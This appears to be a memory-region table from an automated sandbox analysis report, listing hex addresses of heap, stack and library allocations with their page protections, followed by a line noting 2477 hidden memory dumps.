trusted library allocation
|
page read and write
|
||
18A000
|
heap
|
page read and write
|
||
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
25F000
|
heap
|
page read and write
|
||
250000
|
heap
|
page read and write
|
||
1E30000
|
direct allocation
|
page read and write
|
||
20F000
|
heap
|
page read and write
|
||
7F7000
|
heap
|
page read and write
|
||
181000
|
heap
|
page read and write
|
||
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
1CE02000
|
trusted library section
|
page read and write
|
||
7FE89C4C000
|
trusted library allocation
|
page read and write
|
||
2750000
|
remote allocation
|
page read and write
|
||
7FE89A82000
|
trusted library allocation
|
page read and write
|
||
4A67000
|
heap
|
page read and write
|
||
125CF000
|
trusted library allocation
|
page read and write
|
||
14F000
|
heap
|
page read and write
|
||
145000
|
heap
|
page read and write
|
||
3357000
|
heap
|
page read and write
|
||
3315000
|
heap
|
page read and write
|
||
1A7B4000
|
heap
|
page execute and read and write
|
||
1CEE2000
|
trusted library section
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
7FE89A72000
|
trusted library allocation
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
1A834000
|
heap
|
page execute and read and write
|
||
1C12E000
|
stack
|
page read and write
|
||
1B05E000
|
stack
|
page read and write
|
||
23E000
|
heap
|
page read and write
|
||
2330000
|
heap
|
page read and write
|
||
47A5000
|
heap
|
page read and write
|
||
1D060000
|
trusted library section
|
page read and write
|
||
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
1C673000
|
heap
|
page read and write
|
||
442F000
|
heap
|
page read and write
|
||
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
7E2000
|
heap
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
21E3000
|
trusted library allocation
|
page read and write
|
||
41C000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
23E8000
|
trusted library allocation
|
page read and write
|
||
2AD0000
|
trusted library allocation
|
page read and write
|
||
1B1B0000
|
heap
|
page read and write
|
||
1A81E000
|
stack
|
page read and write
|
||
4771000
|
heap
|
page read and write
|
||
43A8000
|
heap
|
page read and write
|
||
4340000
|
heap
|
page read and write
|
||
3CAF000
|
stack
|
page read and write
|
||
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
3B7D000
|
stack
|
page read and write
|
||
1CBD000
|
direct allocation
|
page read and write
|
||
1AB5B000
|
heap
|
page read and write
|
||
1CCB6000
|
trusted library section
|
page read and write
|
||
3CE000
|
heap
|
page read and write
|
||
150000
|
trusted library allocation
|
page read and write
|
||
2767000
|
trusted library allocation
|
page read and write
|
||
1B18B000
|
stack
|
page read and write
|
||
259000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
287000
|
heap
|
page read and write
|
||
7FE89A10000
|
trusted library allocation
|
page read and write
|
||
1CFED000
|
trusted library section
|
page read and write
|
||
476E000
|
heap
|
page read and write
|
||
1CC0000
|
direct allocation
|
page read and write
|
||
4A6A000
|
heap
|
page read and write
|
||
4A65000
|
heap
|
page read and write
|
||
2BF0000
|
trusted library allocation
|
page read and write
|
||
1D80000
|
heap
|
page read and write
|
||
805000
|
heap
|
page read and write
|
||
113000
|
heap
|
page read and write
|
||
4ED000
|
heap
|
page read and write
|
||
5A7000
|
heap
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
4EC9000
|
heap
|
page read and write
|
||
1B11E000
|
stack
|
page read and write
|
||
439B000
|
heap
|
page read and write
|
||
4401000
|
heap
|
page read and write
|
||
3B31000
|
heap
|
page read and write
|
||
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
121B1000
|
trusted library allocation
|
page read and write
|
||
1CF7A000
|
trusted library section
|
page read and write
|
||
3A8E000
|
stack
|
page read and write
|
||
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
41E000
|
heap
|
page read and write
|
||
18C000
|
heap
|
page read and write
|
||
2D0000
|
heap
|
page read and write
|
||
453E000
|
heap
|
page read and write
|
||
7FE89A2C000
|
trusted library allocation
|
page read and write
|
||
11F000
|
heap
|
page read and write
|
||
299C000
|
stack
|
page read and write
|
||
273F000
|
trusted library allocation
|
page read and write
|
||
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
1A82E000
|
stack
|
page read and write
|
||
7FE8989D000
|
trusted library allocation
|
page execute and read and write
|
||
7FE89BF4000
|
trusted library allocation
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
7FE8987D000
|
trusted library allocation
|
page execute and read and write
|
||
4C49000
|
heap
|
page read and write
|
||
27D3000
|
trusted library allocation
|
page read and write
|
||
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
1C95F000
|
stack
|
page read and write
|
||
255F000
|
trusted library allocation
|
page read and write
|
||
4A3E000
|
heap
|
page read and write
|
||
338E000
|
heap
|
page read and write
|
||
1B7AE000
|
stack
|
page read and write
|
||
3DE000
|
stack
|
page read and write
|
||
1D0000
|
trusted library allocation
|
page read and write
|
||
23B4000
|
heap
|
page read and write
|
||
1A718000
|
heap
|
page execute and read and write
|
||
388C000
|
stack
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
1AC92000
|
heap
|
page read and write
|
||
D6E000
|
stack
|
page read and write
|
||
1C439000
|
heap
|
page read and write
|
||
4A40000
|
heap
|
page read and write
|
||
2986000
|
trusted library allocation
|
page read and write
|
||
480F000
|
heap
|
page read and write
|
||
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
439B000
|
heap
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
2761000
|
trusted library allocation
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
7FE898A2000
|
trusted library allocation
|
page read and write
|
||
360000
|
heap
|
page read and write
|
||
49D7000
|
heap
|
page read and write
|
||
24C000
|
heap
|
page read and write
|
||
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
249000
|
heap
|
page read and write
|
||
7FE898A4000
|
trusted library allocation
|
page read and write
|
||
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
3302000
|
heap
|
page read and write
|
||
1A728000
|
heap
|
page execute and read and write
|
||
241A000
|
heap
|
page read and write
|
||
3DAF000
|
stack
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
203B000
|
heap
|
page read and write
|
||
1CFF000
|
direct allocation
|
page read and write
|
||
49D3000
|
heap
|
page read and write
|
||
3F0000
|
trusted library allocation
|
page read and write
|
||
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
444000
|
heap
|
page read and write
|
||
565000
|
heap
|
page read and write
|
||
1B320000
|
heap
|
page read and write
|
||
3A8F000
|
trusted library allocation
|
page read and write
|
||
7FE89A80000
|
trusted library allocation
|
page execute and read and write
|
||
1CF47000
|
trusted library section
|
page read and write
|
||
1D60000
|
direct allocation
|
page read and write
|
||
29BE000
|
stack
|
page read and write
|
||
7FE898AB000
|
trusted library allocation
|
page read and write
|
||
1A998000
|
stack
|
page read and write
|
||
619000
|
heap
|
page read and write
|
||
1B18F000
|
stack
|
page read and write
|
||
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
1CE10000
|
trusted library section
|
page read and write
|
||
1A680000
|
heap
|
page read and write
|
||
1C700000
|
heap
|
page read and write
|
||
1CCB4000
|
trusted library section
|
page read and write
|
||
476E000
|
heap
|
page read and write
|
||
46DB000
|
heap
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
3400000
|
direct allocation
|
page read and write
|
||
2772000
|
trusted library allocation
|
page read and write
|
||
4830000
|
heap
|
page read and write
|
||
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
4401000
|
heap
|
page read and write
|
||
1CEEA000
|
trusted library section
|
page read and write
|
||
276B000
|
trusted library allocation
|
page read and write
|
||
47A5000
|
heap
|
page read and write
|
||
441B000
|
heap
|
page read and write
|
||
1CFBD000
|
trusted library section
|
page read and write
|
||
3CD0000
|
trusted library allocation
|
page read and write
|
||
4751000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
4D3000
|
heap
|
page read and write
|
||
43AB000
|
heap
|
page read and write
|
||
1F10000
|
direct allocation
|
page read and write
|
||
18C000
|
heap
|
page read and write
|
||
2688000
|
heap
|
page read and write
|
||
47A1000
|
heap
|
page read and write
|
||
13D000
|
heap
|
page read and write
|
||
2788000
|
trusted library allocation
|
page read and write
|
||
1CF0E000
|
trusted library section
|
page read and write
|
||
55B000
|
heap
|
page read and write
|
||
2B0000
|
heap
|
page read and write
|
||
54F000
|
heap
|
page read and write
|
||
3A8F000
|
trusted library allocation
|
page read and write
|
||
4B8000
|
heap
|
page read and write
|
||
4771000
|
heap
|
page read and write
|
||
46DB000
|
heap
|
page read and write
|
||
7FE89AA4000
|
trusted library allocation
|
page read and write
|
||
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
4747000
|
heap
|
page read and write
|
||
4618000
|
heap
|
page read and write
|
||
2775000
|
trusted library allocation
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
247E000
|
stack
|
page read and write
|
||
1A77D000
|
heap
|
page read and write
|
||
21E9000
|
trusted library allocation
|
page read and write
|
||
159000
|
heap
|
page read and write
|
||
2AD000
|
heap
|
page read and write
|
||
342000
|
heap
|
page read and write
|
||
44C3000
|
heap
|
page read and write
|
||
2170000
|
heap
|
page execute and read and write
|
||
1CD8A000
|
trusted library section
|
page read and write
|
||
152000
|
heap
|
page read and write
|
||
476E000
|
heap
|
page read and write
|
||
2F30000
|
trusted library allocation
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
2FE7000
|
heap
|
page read and write
|
||
116000
|
heap
|
page read and write
|
||
46DC000
|
heap
|
page read and write
|
||
4E7000
|
heap
|
page read and write
|
||
49D7000
|
heap
|
page read and write
|
||
1D010000
|
trusted library section
|
page read and write
|
||
1D40000
|
heap
|
page execute and read and write
|
||
104000
|
heap
|
page read and write
|
||
350000
|
trusted library allocation
|
page read and write
|
||
4CA000
|
heap
|
page read and write
|
||
1B420000
|
heap
|
page read and write
|
||
25B000
|
heap
|
page read and write
|
||
34AD000
|
trusted library allocation
|
page read and write
|
||
1ED0000
|
heap
|
page read and write
|
||
1CE00000
|
trusted library section
|
page read and write
|
||
2D80000
|
trusted library allocation
|
page read and write
|
||
3A89000
|
trusted library allocation
|
page read and write
|
||
3413000
|
direct allocation
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
446F000
|
heap
|
page read and write
|
||
1C20000
|
heap
|
page read and write
|
||
2788000
|
trusted library allocation
|
page read and write
|
There are 2477 hidden memdumps, click here to show them.